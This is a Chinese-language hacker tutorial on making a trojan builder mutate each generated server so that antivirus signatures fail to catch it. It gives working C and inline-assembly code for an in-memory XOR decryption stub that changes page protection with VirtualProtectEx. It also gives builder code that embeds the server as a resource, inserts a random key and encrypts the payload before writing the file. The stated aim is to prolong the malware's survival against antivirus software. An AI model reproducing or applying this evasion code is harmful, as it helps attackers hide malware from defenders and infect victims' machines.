实现生成木马的自动变异

实现生成木马的自动变异收藏在现在这个杀毒软件横行的时代。木马在发布没几天，就会被各大杀毒软件盯上，然后小黑们就只能无奈的做着免杀，加花指令、加壳、改特征码，忙得半死，终于免杀了，可没用多久，又被杀了。这种情况我以前也常常遇到。那么我们能不能做到每次生成的木马都不一样呢，这样给杀毒软件定位特征码就带来了一定的难度，延长了木马的生存时间。今天我们就来实现这一功能。我们大家都知道木马服务端一般是先编写完成，然后以资源的形式导入到客户端，使用时再由客户端生成。既然服务端是事先写好的，那么要实现每次生成都产生不同的代码，唯一的方法就是加密，每次都用不同的密钥对代码进行加密，但是加密后的代码在内存中是不能运行的，所以运行加密代码之前就一定要解密。具体过程如（图1）从图中可以看出，首先由客户端生成服务端，在生成的过程中对其主体代码进行加密（用随机密钥），由于在服务端中有解密代码，而图中服务端程序是从下往上执行的，所以运行程序后首先执行解密代码，对主体代码进行解密，解密完成后再去执行木马主体代码。整个流程就如上所诉。下面我们来一步一步实现上面的想法。首先是木马主体代码的编写，由于这不是本文的重点，所以就用一段枚举进程的函数来代替，这里不再讨论，具体代码包含在光盘中，已加了具体注释。下面我们就来实现解密部分，这里我们用的加解密算法是抑或，抑或一次是加密，抑或两次是解密，比如97和61抑或一次的结果是92，这是加密的过程；再把 92和61抑或之后的结果97，这就是解密的过程。在这个加解密过程中的密钥就是61。当然你也可以用更强悍的加解密算法。在内存中要实现解密，那么我们还需要知道主体代码的起始位置和大小，然后一个字节一个字节进行解密，这里我用汇编来实现，用汇编实现这个过程个人觉得比较方便，代码如下： //得到MainCode函数地址 lea esi,MainCode; mov MainCodeAddr,esi; //得到Decoded函数地址 lea eax,Decoded; //计算MainCode函数的大小 sub eax,esi; mov SizeOfCode,eax;在上面代码中Decoded函数就是解密函数，而MainCode函数就是木马的主体代码，从图1中可以看出且MainCode函数就在解密函数上面，那么两个函数的起始地址相减，就得到了MainCode函数的大小。得到了这些信息后，我们就要对主体代码进行一个字节一个字节的解密了。这里用一个循环结构来实现： decode: //抑或解密，BL中的存的是密钥 xor byte ptr[esi],BL; inc esi; dec eax; jne decode;到这里也许你会觉得一切都完成了，但是我们还有一步忘做了，由于我们现在修改的是内存中代码段的数据，而这些内存页是不可写的，那么我们在进行这些内存操 作之前还必须要改变内存页保护属性，所幸比较简单，只需要调用VirtualProtectEx函数即可。下面我们来看看完整的解密代码吧： DWORD SizeOfCode,MianCodeAddr,DecodedAddr; int Decoded() { //密钥,做密钥时取第一个字节 char MyCode[255]="AAAAAAAAAAAAAAAAAAAAAAAAA"; DWORD oldProtect; //得到自身进程句柄 HANDLE hProcess=GetCurrentProcess(); //改变内存页属性为可读写，由于这里不知道主体代码的大小所以设大点，0x1000 VirtualProtectEx(hProcess,&MianCode,0x1000,PAGE_READWRITE,&oldProtect); __asm { pushad; //得到MainCode函数地址 lea esi,MianCode; mov MianCodeAddr,esi; //得到Decoded函数地址 lea eax,Decoded; mov DecodedAddr,eax; //计算MainCode函数的大小 sub eax,esi; mov SizeOfCode,eax; xor BL,BL; mov BL,MyCode[0]; //解密 decode: xor byte ptr[esi],BL; inc esi; dec eax; jne decode; popad; } return 0; }上面代码中的MyCode变量中存的那么多字符中只有MyCode[0]中的字符是做为密钥的，那么怎么实现密钥的随机性呢，这个要靠客户端实现，在客户端中我们要用搜索的方式，找到服务端中MyCode变量中一连串A的位置，并把第一字符改为加密的密钥，而产生这个加密的密钥是随机的，那么当服务端中把 MyCode[0]作为密钥的时，读到的正是我们改成随机密钥的这个值。这样就实现了密钥的随机性，具体过程会在客户端实现中讲到。这样之后我们还需要在主函数里调用Decoded()函数，然后调用printf函数输出SizeOfCode（主体代码长度）、 MianCodeAddr（主体代码函数的起始地址）这两个变量的值，因为在客户端对服务端主体代码加密的过程中要用到这两个值，执行效果如（图2）：得到这两个值后，删除掉主函数中输出部分代码，并且添加上对MianCode函数的调用，具体代码如下： int main(int argc, char* argv[]) { //解密代码 Decoded(); //主体代码 MainCode(); getchar(); return 0; }这时候运行这个程序会报错如（图3）所示：这是因为主体代码并没用经过加密，从抑或算法的特点可知，在内存中对没有加密的代码解密的结果就相当与对其进行了加密，加密后的代码运行当然会报错。服务端到这里就写完了，那么下面我们就来实现客户端的编写，客户端的主体功能就是对服务端的主体代码进行加密。这里服务端我们要以资源的形式包含在客户端中。先建立的一个mfc工程，如图4所示：为了方便可以直接修改工程目录下.rc和Resource.h文件把服务端以资源的形式导入，在.rc文件下添加命令如下：ID_MAGICDEL_EXE C_BINARYTYPE ma.exema.exe表示服务端的文件名，要放在工程目录下。在Resource.h文件下添加如下命令： #define ID_MAGICDEL_EXE 100 #define RC_BINARYTYPE 911编译后，ma.exe就会以资源的形式包含在工程中，我们就可以调用资源处理的API函数对其进行处理了。首先我们要把资源文件写入到一个内存空间当中，对内存中的数据进行操作，总比对文件进行操作来得快和方便。具体代码如下： //查找木马资源 HRSRChrsrc = FindResource(NULL, MAKEINTRESOURCE(ID_MAGICDEL_EXE), MAKEINTRESOURCE(RC_BINARYTYPE)); //导入资源到存储器 HGLOBAL hglobal = LoadResource(NULL, hrsrc); //锁定资源 void *psrc = LockResource(hglobal); //得到资源大小 DWORD size = SizeofResource(NULL, hrsrc); //申请内存空间 char *hmem=(char *)malloc(size+1); DWORD nsize; //把资源写入内存 WriteProcessMemory(GetCurrentProcess(),hmem,(LPCVOID *)psrc,size,&nsize);这样我们就把资源文件写入到我们指定得内存空间了，hmem变量就是指向这个内存空间的起始位置的指针，也就是指向了服务端文件开始的位置，那么下面我们就要定位到主体代码的位置。还记得前面我们得到的MianCodeAddr（主体代码函数的起始地址）变量的值吗？现在我们就要用到它了，图2中显示的值是401000h，由于这是在内存中的偏移地址，因此还加上了基址400000h，那么401000h－400000h就是文件中主体代码的偏移地址： 1000h。得到了这个偏移地址后，要定位到此时的主体代码位置也就容易多了，只要用hmem变量指向的内存空间的地址加上1000h就是主体代码的起始位置了。这个问题解决之后，加密过程其实和解密过程是差不多的，因为都是用抑或算法实现的。那么还剩下的问题就是怎么生成随机密钥，这里我把它写成了一个函数，如下： //生成一个随机字符（密钥） char AutorChar() { char a[16] ={'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'}; int i; //播下随机数发生器种子 srand((unsigned)time(NULL)); //得到随机数 i = rand(); //循环减去16，直到随机数不大于15 while(i>15) { i-=16; } //返回随机字符 return a[i]; }这样每次调用这个函数都会生成一个随机的字符作为密钥。当然我们还需要把MyCode变量中一连串A的第一个字符改成我们的随机密钥，我们用内存搜索的方式来定位这一连串A，然后把第一个字符改成随机密钥。搜索修改函数如下： //搜索内存中的信息,并将其修改 //hmen要查找的起始地址，len要查找的内存大小，from要查找的字符指针，to要修改成的内容 bool ModifyMem(char *hmem,int len,char *from,char *to) { char charf[100],chart[100],*charg; bool result=false; strcpy(charf,from); strcpy(chart,to); for(int i=0;i<len;i++) { charg=(char *)&hmem[i]; //比较找到的字符和要查找的字符 if(strcmp(charg,charf)==0) { // 找到后修改内存中的字符 if(WriteProcessMemory(GetCurrentProcess(),(LPVOID)(hmem+i),chart,strlen(chart)+1,NULL)) result=true; break; } } return result; }所有的这些操作完成后，就可以把这个内存空间中的数据写入到文件中了，这样就生成了随机加密后的木马程序，实现了生成木马的自动变异，下面给出客户端主体部分代码： void CodeFile(char *FileName) { //查找木马资源 HRSRC hrsrc = FindResource(NULL, MAKEINTRESOURCE(ID_MAGICDEL_EXE), MAKEINTRESOURCE(RC_BINARYTYPE)); //导入资源到存储器 HGLOBAL hglobal = LoadResource(NULL, hrsrc); //锁定资源 void *psrc = LockResource(hglobal); //得到资源大小 DWORD size = SizeofResource(NULL, hrsrc); //申请内存空间 char *hmem=(char *)malloc(size+1); DWORD nsize; //把资源写入内存 WriteProcessMemory(GetCurrentProcess(),hmem,(LPCVOID *)psrc,size,&nsize); //要查找的一连串A char from[255]="AAAAAAAAAAAAAAAAAAAAAAAAA"; char to[255]={0}; //得到随机加密口令 to[0]=AutorChar(); __asm { pushad; //得到资源在内存中的启示地址 mov esi,hmem; //定位到要加密的代码地址 add esi,0x1000; //把要的代码大小赋给eax，上面得到的SizeOfCode（主体代码长度）的值就 //用于此 mov eax,0xd0; xor BL,BL; //把密钥给BL mov BL,to[0]; //抑或加密 code: xor byte ptr[esi],BL; inc esi; dec eax; jne code; } //修改原始加密口令 if(!ModifyMem(hmem,size,from,to)) { ::MessageBox(NULL,"写入加密口令错误","错误",NULL); return; } //创建文件 HANDLE hFile = CreateFile(FileName, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); DWORD cbWritten; //把内存中的资源写入文件 WriteFile(hFile, hmem, size, &cbWritten, 0); CloseHandle(hFile); ::GlobalFree(psrc); free(hmem); }我们只需要在生成按钮的单击事件中添加对CodeFile函数的调用即可。编译后，用客户端生成服务端，发现运行正常，如（图5）